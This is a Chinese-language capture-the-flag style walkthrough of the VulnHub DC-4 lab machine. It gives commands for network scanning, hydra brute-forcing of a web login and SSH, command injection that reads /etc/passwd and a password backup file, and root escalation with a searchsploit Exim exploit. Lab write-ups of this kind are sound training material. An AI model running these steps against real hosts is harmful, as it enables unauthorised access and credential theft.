一:信息收集
1:主机发现
arp-scan -I eth0 10.9.23.0/24
kali的ip
10.9.23.112
靶机的ip
10.9.23.52
2:端口扫描
nmap -A -p- -T4 10.9.23.52
3:端口探测
二:渗透测试
1:密码爆破
尝试九头蛇进行爆破
构建语句:
hydra -l admin -P pass.txt 10.9.23.52 http-post-form "/login.php:username=^USER^&password=PASS:S=logout" -F
"/login.php:username=^USER^&password=^PASS^:S=logout"
:这是指定登录表单的位置和字段。USER和PASS是占位符,Hydra会用用户名和密码进行替换。":S=logout"告诉Hydra在找到正确的凭据后注销会话。-F
:这个标志告诉Hydra在找到正确的凭据后停止攻击。
利用bp爆破
爆破出账户密码为
admin
happy
2:指纹探测
登录测试
发现run可以提交命令,用bp利用一下文件读取漏洞
whoami
cat+/etc/passwd
发现三个用户,经过测试可以发现jim的家目录可以访问
ls+-l+/home/jim
查看目录中的文件,发现在backups中有old-passwords.bak文件,查看:
ls+-l+/home/jim/backups
cat+/home/jim/backups/old-passwords.bak
保存其中的密码到文件1.txt,然后可以用hydra对jim用户进行ssh登录密码爆破:
hydra -l jim -P 1.txt ssh://10.9.23.52
得到密码
jim
jibril04
ssh登录:
3:提权
查看可以使用哪些命令:
find / -perm /4000
find / -perm -u=s -type f 2>/dev/null
发现有exim4命令,可以提权。
exim4是一种邮件传输代理(MTA),用于路由和传递电子邮件。
查看exim4的版本号为4.89:
/usr/sbin/exim4 --version
在kali中寻找提权的方法:
searchsploit exim
存在本地提权
发现46996.sh脚本可以提权,将其发送到DC-4中
find / -name 46996.sh
scp /usr/share/exploitdb/exploits/linux/local/46996.sh [email protected]:/home/jim
scp是Secure Copy的缩写,是一个用于在两台计算机之间安全地复制文件或目录的命令。通过scp命令,可以在本地计算机和远程计算机之间进行文件的传输,同时保证传输过程中的数据安全性。scp命令可以通过SSH协议进行数据传输,因此在使用scp命令时需要输入远程计算机的用户名和IP地址或域名
执行46996.sh文件:
成功提权
获取最终flag
标签:10.9,exim4,jim,scp,提权,vulnhub,靶机,dc4,23.52 From: https://www.cnblogs.com/woaishuaidan/p/18060929